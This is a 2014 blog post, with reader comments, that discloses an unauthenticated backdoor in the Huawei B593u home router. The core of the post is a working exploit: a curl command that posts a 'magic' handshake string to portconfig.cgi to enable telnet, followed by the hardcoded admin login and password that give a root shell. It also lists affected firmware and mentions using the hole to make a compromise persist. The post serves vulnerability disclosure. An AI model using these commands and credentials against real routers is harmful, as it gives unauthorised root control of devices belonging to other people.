Tuesday, August 19, 2014

Huapwn - Backdoor on your Huawei B593u

Public Huawei document I linked couple days ago mentioned factory diagnostics tool called "Huawei deviceLocker V0.1" that will grant access to root shell on router. I got curious on how this would actually work and came to conclusion it must be something extremely simple and insecure, it IS Huawei after all. Did some poking around /bin/web process I figured this out - it's all there in clear-text for anyone to read. And that admin password is in Huawei docs, not exactly secret either. In case you didn't realize there's no need for authentication to exploit this. Protip: Try to hide you backdoors a bit better next time.

# Send magic packet that enables telnet, timeout error is expected
curl -m5 \
-d "switch=0&handshakeFlag=zzfdfwetljioi34004t50jodjgkjgjiyte894uifdug89h98y3hjhgjdgjuihjqq" \
http://192.168.1.1/portconfig.cgi

telnet 192.168.1.1
# if telnet says connection refused keep trying every few seconds, it'll work
# if telnet just hangs and timeouts then port is not open and no point retrying with telnet
# login: admin
# pass: HW4GCPE
# type "shell" or "sh" to open root shell

To be fair Huawei is at least trying since this backdoor HAS been closed recently. Not that I could find any public disclosure about exactly this hole. B593u is rather common device (at least in Europe) and most operators still only distribute old firmware versions where this hole is present.

Polkomtel SP103 and T-Mobile SP102/SP104/SP105 (which are latest known firmwares for B593U-12) have slightly different /bin/web binary than older builds. Newer versions still have same backdoor function present using same "handshake", but portconfig.cgi is no longer in list of accepted URLs. It's not actual CGI, /bin/web simply have list of URLs and which internal functions to trigger for them. This list have been edited to either remove this backdoor, or worse, to hide it and still allow triggering in some other way.

So unless you're willing to take risk with flashing unsupported firmware customized for another operator your router is just waiting to be hacked. Hacked permanently that is.

Combined with persistent hack I posted few hours ago malicious hackers could seriously own device and not even factory reset paired with full firmware upgrade can help you. Or have you seen many anti rootkit tools for routers lately?


5 comments:

  1. hi, i have a modem B593U-12 ,but i cannot login with the dafault password admin, try to reset to factory setting also cannot login using password admin. anywhere can get the password to login .thank u so much. my mail hocklonggoh@gmail.com

    ReplyDelete
    Replies
    1. If you're running older firmware where above described exploit works just use it, login to root shell, dump config partition and password is right there in cleartext.

      Delete
  2. Hi!. Do you mind sharing "Huawei deviceLocker V0.1"?? writeConfig.exe I think it is right? I would like to check within my provider because this is a major issue.
    Cheers!

    ReplyDelete
    Replies
    1. Hi. No idea where to get that exe. Information how this backdoor works came from observing binaries present on router and via trial and error. Tip that such backdoor must be somewhere came from that Huawei document referring to devicelocker program.

      Delete
    2. So that magic packet is always the same one? Because I tried testing against my 593-22 and not working at all. Cheers and great work!

      Delete

Got something to say?!